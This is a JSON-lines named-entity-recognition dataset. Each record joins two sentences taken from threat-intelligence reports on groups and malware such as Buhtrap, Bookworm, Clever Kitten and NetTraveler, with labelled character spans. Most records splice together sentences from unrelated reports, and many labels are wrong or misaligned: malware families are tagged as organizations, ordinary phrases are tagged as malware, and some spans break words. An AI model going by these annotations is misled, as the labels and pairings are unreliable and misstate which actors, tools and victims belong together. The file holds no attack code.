{"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks .", "spans": [{"start": 65, "end": 71, "label": "Organization"}, {"start": 79, "end": 107, "label": "Malware"}, {"start": 283, "end": 307, "label": "Malware"}, {"start": 312, "end": 334, "label": "Malware"}, {"start": 346, "end": 353, "label": "Organization"}, {"start": 408, "end": 410, "label": "System"}, {"start": 438, "end": 443, "label": "Malware"}, {"start": 446, "end": 451, "label": "Malware"}, {"start": 454, "end": 464, "label": "Malware"}, {"start": 469, "end": 484, "label": "Malware"}]}
{"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . The threat actors have continually used Flash Player installers and Flash slideshows for decoys .", "spans": [{"start": 36, "end": 51, "label": "System"}, {"start": 54, "end": 66, "label": "Malware"}, {"start": 119, "end": 160, "label": "Malware"}, {"start": 203, "end": 226, "label": "Malware"}, {"start": 231, "end": 247, "label": "Malware"}]}
{"text": "ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine . The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan LOC where a majority of the government of Thailand exists .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 19, "end": 34, "label": "Malware"}, {"start": 37, "end": 53, "label": "Malware"}, {"start": 60, "end": 86, "label": "Malware"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 171, "end": 173, "label": "System"}, {"start": 246, "end": 256, "label": "Organization"}]}
{"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 .", "spans": [{"start": 80, "end": 87, "label": "Malware"}, {"start": 90, "end": 127, "label": "Malware"}, {"start": 206, "end": 213, "label": "Organization"}, {"start": 279, "end": 301, "label": "Organization"}]}
{"text": "Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible . At the moment , the group is known to target Russian and Ukrainian banks .", "spans": [{"start": 41, "end": 56, "label": "System"}, {"start": 90, "end": 100, "label": "Malware"}, {"start": 105, "end": 121, "label": "Malware"}, {"start": 204, "end": 209, "label": "Organization"}]}
{"text": "This script relays commands and output between the controller and the system . Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network .", "spans": [{"start": 12, "end": 38, "label": "Malware"}, {"start": 79, "end": 86, "label": "Organization"}, {"start": 156, "end": 160, "label": "Organization"}]}
{"text": "But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface . Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) .", "spans": [{"start": 46, "end": 54, "label": "System"}, {"start": 129, "end": 151, "label": "Malware"}, {"start": 189, "end": 221, "label": "System"}, {"start": 226, "end": 235, "label": "System"}, {"start": 421, "end": 425, "label": "Organization"}]}
{"text": "PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 44, "end": 63, "label": "Malware"}, {"start": 266, "end": 279, "label": "Vulnerability"}, {"start": 282, "end": 295, "label": "Vulnerability"}, {"start": 299, "end": 312, "label": "Vulnerability"}]}
{"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 41, "end": 58, "label": "Malware"}, {"start": 189, "end": 196, "label": "Organization"}]}
{"text": "As detailed in the previous section , this malware is able to manipulate and exfiltrate emails . It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan .", "spans": [{"start": 62, "end": 94, "label": "Malware"}, {"start": 145, "end": 165, "label": "Malware"}, {"start": 176, "end": 183, "label": "Malware"}, {"start": 220, "end": 233, "label": "Malware"}]}
{"text": "Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" . Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 7, "end": 26, "label": "Malware"}, {"start": 171, "end": 178, "label": "Vulnerability"}, {"start": 179, "end": 190, "label": "Vulnerability"}, {"start": 206, "end": 212, "label": "Malware"}]}
{"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 70, "end": 92, "label": "Malware"}, {"start": 97, "end": 122, "label": "Malware"}]}
{"text": "Using XREFs during static analysis is a common technique to quickly find where functions of interest are called . However , it is still widely used , notably in Russia .", "spans": [{"start": 6, "end": 11, "label": "System"}, {"start": 68, "end": 100, "label": "Malware"}]}
{"text": "Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server . As noted in our previous blog on Buhtrap , this gang has been actively targeting Russian businesses , mostly through spear-phishing .", "spans": [{"start": 27, "end": 35, "label": "System"}, {"start": 83, "end": 91, "label": "System"}, {"start": 167, "end": 181, "label": "Malware"}, {"start": 246, "end": 252, "label": "System"}, {"start": 267, "end": 297, "label": "Malware"}, {"start": 389, "end": 399, "label": "Organization"}]}
{"text": "As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code . It is thus interesting to see Buhtrap add strategic web compromises to their arsenal .", "spans": [{"start": 37, "end": 45, "label": "System"}, {"start": 52, "end": 58, "label": "System"}, {"start": 59, "end": 85, "label": "Malware"}]}
{"text": "We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan . The first malware we saw was the lurk downloader , which was distributed on October 26th .", "spans": [{"start": 43, "end": 52, "label": "System"}, {"start": 183, "end": 199, "label": "Malware"}, {"start": 250, "end": 265, "label": "Malware"}]}
{"text": "Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload .", "spans": [{"start": 26, "end": 47, "label": "Malware"}, {"start": 58, "end": 73, "label": "System"}, {"start": 79, "end": 95, "label": "Malware"}, {"start": 195, "end": 211, "label": "Indicator"}, {"start": 215, "end": 227, "label": "Indicator"}]}
{"text": "A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting . Buhtrap is getting better at disguising the code they inject into compromised websites .", "spans": [{"start": 19, "end": 35, "label": "Malware"}, {"start": 77, "end": 85, "label": "Malware"}, {"start": 174, "end": 181, "label": "Organization"}, {"start": 240, "end": 260, "label": "Malware"}]}
{"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software .", "spans": [{"start": 35, "end": 46, "label": "Malware"}, {"start": 64, "end": 74, "label": "Malware"}, {"start": 88, "end": 105, "label": "Malware"}, {"start": 120, "end": 128, "label": "System"}, {"start": 192, "end": 211, "label": "Malware"}, {"start": 294, "end": 299, "label": "Organization"}]}
{"text": "We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information . They have different functions and ACTs of spreading , but the same purpose \u2014 to steal money from the accounts of businesses .", "spans": [{"start": 16, "end": 32, "label": "System"}, {"start": 33, "end": 59, "label": "Malware"}, {"start": 310, "end": 320, "label": "Organization"}]}
{"text": "Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": [{"start": 33, "end": 50, "label": "Malware"}, {"start": 105, "end": 109, "label": "Organization"}, {"start": 225, "end": 229, "label": "Malware"}, {"start": 267, "end": 278, "label": "Organization"}]}
{"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . The first encounter with Buhtrap was registered back in 2014 .", "spans": [{"start": 59, "end": 65, "label": "Malware"}, {"start": 70, "end": 95, "label": "Malware"}]}
{"text": "Tweety Chat 's Android version can record audio , too . For now , we can call RTM one of the most active financial Trojans .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 35, "end": 47, "label": "Malware"}, {"start": 78, "end": 81, "label": "Malware"}, {"start": 105, "end": 114, "label": "Organization"}]}
{"text": "One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files . At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments \u2014 to the tune of at least $150,000 per hit .", "spans": [{"start": 27, "end": 38, "label": "System"}, {"start": 41, "end": 71, "label": "Malware"}, {"start": 202, "end": 226, "label": "Organization"}]}
{"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . Buhtrap resurfaced in the beginning of 2017 in the TwoBee campaign , where it served primarily as means of malware delivery .", "spans": [{"start": 4, "end": 15, "label": "Malware"}, {"start": 30, "end": 68, "label": "Malware"}, {"start": 71, "end": 101, "label": "Malware"}, {"start": 104, "end": 108, "label": "System"}, {"start": 123, "end": 133, "label": "Malware"}]}
{"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . After the source codes of their tools became public in 2016 , the name Buhtrap was used for the financial Trojan .", "spans": [{"start": 4, "end": 19, "label": "Malware"}, {"start": 41, "end": 59, "label": "Malware"}, {"start": 62, "end": 70, "label": "Malware"}, {"start": 73, "end": 81, "label": "Malware"}, {"start": 88, "end": 93, "label": "Malware"}, {"start": 107, "end": 119, "label": "Malware"}, {"start": 218, "end": 234, "label": "Malware"}]}
{"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . Just like last time , Buhtrap is spreading through exploits embedded in news outlets .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 106, "end": 146, "label": "Malware"}, {"start": 221, "end": 233, "label": "Organization"}]}
{"text": "To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA . Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each .", "spans": [{"start": 3, "end": 30, "label": "Malware"}, {"start": 44, "end": 54, "label": "System"}, {"start": 66, "end": 72, "label": "System"}, {"start": 97, "end": 121, "label": "Malware"}, {"start": 124, "end": 162, "label": "Malware"}]}
{"text": "Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials . As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses .", "spans": [{"start": 0, "end": 18, "label": "Organization"}, {"start": 190, "end": 194, "label": "System"}, {"start": 199, "end": 206, "label": "System"}, {"start": 242, "end": 246, "label": "System"}, {"start": 257, "end": 264, "label": "System"}, {"start": 298, "end": 307, "label": "System"}, {"start": 316, "end": 349, "label": "Malware"}, {"start": 443, "end": 465, "label": "Organization"}, {"start": 477, "end": 487, "label": "Organization"}]}
{"text": "At this stage , the malware gathers information about the infected computer . \" Buhgalter \" means \" accountant \" in Russian .", "spans": [{"start": 28, "end": 47, "label": "Malware"}]}
{"text": "Initial intrusion stages feature the Win32/Barlaiy implant\u2014notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C . Seeing a campaign like this , inevitably the Anunak/Carbanak documented by Fox-IT and Kaspersky comes to mind .", "spans": [{"start": 37, "end": 50, "label": "System"}, {"start": 75, "end": 105, "label": "Malware"}, {"start": 108, "end": 144, "label": "Malware"}, {"start": 151, "end": 164, "label": "Malware"}, {"start": 212, "end": 227, "label": "Malware"}, {"start": 242, "end": 248, "label": "Organization"}, {"start": 253, "end": 262, "label": "Organization"}]}
{"text": "The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat . The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on .", "spans": [{"start": 4, "end": 30, "label": "System"}, {"start": 36, "end": 62, "label": "Malware"}, {"start": 66, "end": 86, "label": "Organization"}, {"start": 105, "end": 118, "label": "Organization"}, {"start": 241, "end": 249, "label": "Malware"}, {"start": 278, "end": 308, "label": "Malware"}, {"start": 355, "end": 358, "label": "Malware"}]}
{"text": "If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": [{"start": 24, "end": 53, "label": "Malware"}, {"start": 71, "end": 106, "label": "Malware"}, {"start": 140, "end": 156, "label": "Malware"}, {"start": 217, "end": 231, "label": "Indicator"}, {"start": 253, "end": 279, "label": "Organization"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 320, "end": 341, "label": "Organization"}]}
{"text": "Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 61, "end": 92, "label": "Malware"}, {"start": 228, "end": 234, "label": "Indicator"}]}
{"text": "To do this , it employs a number of specific commands via DNSMessenger . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": [{"start": 16, "end": 53, "label": "Malware"}, {"start": 58, "end": 70, "label": "System"}, {"start": 73, "end": 79, "label": "Indicator"}]}
{"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": [{"start": 5, "end": 13, "label": "Malware"}, {"start": 54, "end": 93, "label": "Malware"}, {"start": 173, "end": 184, "label": "Malware"}, {"start": 192, "end": 199, "label": "Vulnerability"}]}
{"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post .", "spans": [{"start": 13, "end": 25, "label": "Malware"}, {"start": 46, "end": 68, "label": "Malware"}, {"start": 95, "end": 123, "label": "Malware"}, {"start": 350, "end": 360, "label": "Organization"}, {"start": 425, "end": 440, "label": "Organization"}]}
{"text": "We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": [{"start": 38, "end": 52, "label": "System"}, {"start": 162, "end": 190, "label": "Malware"}, {"start": 197, "end": 210, "label": "Vulnerability"}]}
{"text": "KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine . In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 73, "end": 105, "label": "Malware"}, {"start": 126, "end": 143, "label": "Malware"}, {"start": 242, "end": 249, "label": "Vulnerability"}, {"start": 250, "end": 272, "label": "Malware"}]}
{"text": "If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system .", "spans": [{"start": 3, "end": 9, "label": "System"}, {"start": 134, "end": 166, "label": "System"}, {"start": 185, "end": 201, "label": "Malware"}, {"start": 285, "end": 291, "label": "Indicator"}, {"start": 321, "end": 328, "label": "Vulnerability"}]}
{"text": "The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data . Most modules were created in 2012 .", "spans": [{"start": 4, "end": 22, "label": "System"}, {"start": 166, "end": 184, "label": "Malware"}, {"start": 189, "end": 204, "label": "Malware"}]}
{"text": "This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard . The attackers began taking them offline in January 2014 .", "spans": [{"start": 28, "end": 46, "label": "Malware"}, {"start": 49, "end": 65, "label": "Malware"}, {"start": 93, "end": 105, "label": "Malware"}]}
{"text": "This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names .", "spans": [{"start": 53, "end": 62, "label": "Malware"}, {"start": 71, "end": 89, "label": "Malware"}, {"start": 217, "end": 231, "label": "Organization"}, {"start": 306, "end": 324, "label": "Organization"}]}
{"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology .", "spans": [{"start": 35, "end": 45, "label": "Malware"}, {"start": 51, "end": 69, "label": "Malware"}, {"start": 79, "end": 90, "label": "System"}, {"start": 99, "end": 115, "label": "Malware"}, {"start": 185, "end": 197, "label": "Organization"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 331, "end": 351, "label": "Organization"}]}
{"text": "In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files . The campaign was active until January 2014 , but during our investigations the C&C servers were shut down .", "spans": [{"start": 18, "end": 37, "label": "System"}, {"start": 50, "end": 90, "label": "Malware"}, {"start": 137, "end": 179, "label": "Malware"}, {"start": 341, "end": 344, "label": "System"}]}
{"text": "The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 36, "end": 59, "label": "System"}, {"start": 111, "end": 128, "label": "Malware"}]}
{"text": "he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . Clever Kitten has moved to leveraging strategic web compromises .", "spans": [{"start": 3, "end": 9, "label": "Organization"}, {"start": 35, "end": 58, "label": "System"}, {"start": 110, "end": 127, "label": "Malware"}, {"start": 211, "end": 224, "label": "Organization"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 159, "end": 172, "label": "Organization"}, {"start": 338, "end": 348, "label": "Organization"}, {"start": 382, "end": 400, "label": "Organization"}]}
{"text": "One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests .", "spans": [{"start": 49, "end": 56, "label": "System"}, {"start": 63, "end": 81, "label": "Malware"}, {"start": 169, "end": 182, "label": "Organization"}]}
{"text": "Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance .", "spans": [{"start": 35, "end": 55, "label": "Malware"}, {"start": 62, "end": 80, "label": "Malware"}, {"start": 119, "end": 132, "label": "Organization"}, {"start": 165, "end": 190, "label": "Malware"}]}
{"text": "The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial .", "spans": [{"start": 4, "end": 22, "label": "System"}, {"start": 23, "end": 50, "label": "Malware"}, {"start": 55, "end": 80, "label": "Malware"}, {"start": 143, "end": 177, "label": "Indicator"}]}
{"text": "He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software . Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": [{"start": 22, "end": 38, "label": "Malware"}, {"start": 82, "end": 105, "label": "Malware"}, {"start": 110, "end": 130, "label": "Malware"}]}
{"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 17, "end": 20, "label": "System"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 54, "end": 74, "label": "Malware"}, {"start": 258, "end": 283, "label": "System"}, {"start": 286, "end": 289, "label": "System"}, {"start": 295, "end": 329, "label": "System"}, {"start": 332, "end": 336, "label": "System"}]}
{"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": [{"start": 66, "end": 84, "label": "Malware"}, {"start": 91, "end": 110, "label": "Malware"}]}
{"text": "The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}, {"start": 120, "end": 128, "label": "Malware"}, {"start": 131, "end": 138, "label": "Malware"}, {"start": 141, "end": 147, "label": "Malware"}, {"start": 150, "end": 168, "label": "Malware"}]}
{"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 37, "end": 44, "label": "Malware"}, {"start": 62, "end": 83, "label": "System"}]}
{"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only . Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 29, "end": 35, "label": "Malware"}]}
{"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host .", "spans": [{"start": 52, "end": 57, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 252, "end": 265, "label": "Organization"}]}
{"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 110, "end": 124, "label": "Malware"}, {"start": 264, "end": 268, "label": "Organization"}, {"start": 269, "end": 277, "label": "Organization"}]}
{"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . There are new TTPs used in this attack \u2013 for example Agent_Drable is leveraging the Django Python framework for command and control infrastructure , the technical details of which are outlined later in the blog .", "spans": [{"start": 67, "end": 77, "label": "Malware"}, {"start": 92, "end": 105, "label": "Malware"}, {"start": 219, "end": 225, "label": "Malware"}, {"start": 226, "end": 232, "label": "System"}]}
{"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants .", "spans": [{"start": 38, "end": 47, "label": "System"}, {"start": 50, "end": 52, "label": "Malware"}, {"start": 63, "end": 89, "label": "Malware"}, {"start": 224, "end": 237, "label": "Malware"}]}
{"text": "The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": [{"start": 111, "end": 124, "label": "System"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 196, "end": 205, "label": "System"}, {"start": 208, "end": 220, "label": "Malware"}, {"start": 308, "end": 315, "label": "Vulnerability"}, {"start": 389, "end": 394, "label": "System"}, {"start": 439, "end": 444, "label": "System"}]}
{"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted .", "spans": [{"start": 33, "end": 42, "label": "Malware"}, {"start": 113, "end": 125, "label": "Malware"}, {"start": 248, "end": 261, "label": "Organization"}]}
{"text": "The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 173, "end": 177, "label": "Malware"}, {"start": 237, "end": 252, "label": "Malware"}, {"start": 265, "end": 271, "label": "System"}, {"start": 272, "end": 280, "label": "Vulnerability"}, {"start": 323, "end": 334, "label": "Organization"}, {"start": 338, "end": 348, "label": "Organization"}]}
{"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . The use of InPage as an attack vector is not commonly seen , with the only previously noted attacks being documented by Kaspersky in late 2016 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 19, "end": 35, "label": "Malware"}, {"start": 38, "end": 57, "label": "Malware"}, {"start": 60, "end": 74, "label": "Malware"}, {"start": 77, "end": 93, "label": "Malware"}, {"start": 96, "end": 107, "label": "Malware"}, {"start": 110, "end": 130, "label": "Malware"}, {"start": 133, "end": 140, "label": "Malware"}, {"start": 174, "end": 180, "label": "Malware"}, {"start": 205, "end": 211, "label": "Malware"}, {"start": 314, "end": 323, "label": "Organization"}]}
{"text": "'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 29, "end": 42, "label": "Malware"}, {"start": 45, "end": 60, "label": "Malware"}, {"start": 63, "end": 76, "label": "Malware"}, {"start": 81, "end": 97, "label": "Malware"}, {"start": 249, "end": 264, "label": "Indicator"}, {"start": 315, "end": 326, "label": "Organization"}, {"start": 330, "end": 340, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}]}
{"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": [{"start": 5, "end": 11, "label": "Malware"}, {"start": 31, "end": 40, "label": "Malware"}, {"start": 72, "end": 87, "label": "Malware"}, {"start": 119, "end": 127, "label": "Malware"}, {"start": 278, "end": 285, "label": "Vulnerability"}, {"start": 290, "end": 305, "label": "Malware"}, {"start": 360, "end": 366, "label": "Organization"}, {"start": 389, "end": 395, "label": "System"}, {"start": 396, "end": 404, "label": "Vulnerability"}, {"start": 468, "end": 475, "label": "Vulnerability"}, {"start": 500, "end": 509, "label": "Organization"}]}
{"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": [{"start": 4, "end": 22, "label": "Malware"}, {"start": 71, "end": 80, "label": "Malware"}, {"start": 200, "end": 218, "label": "Organization"}, {"start": 223, "end": 234, "label": "Organization"}]}
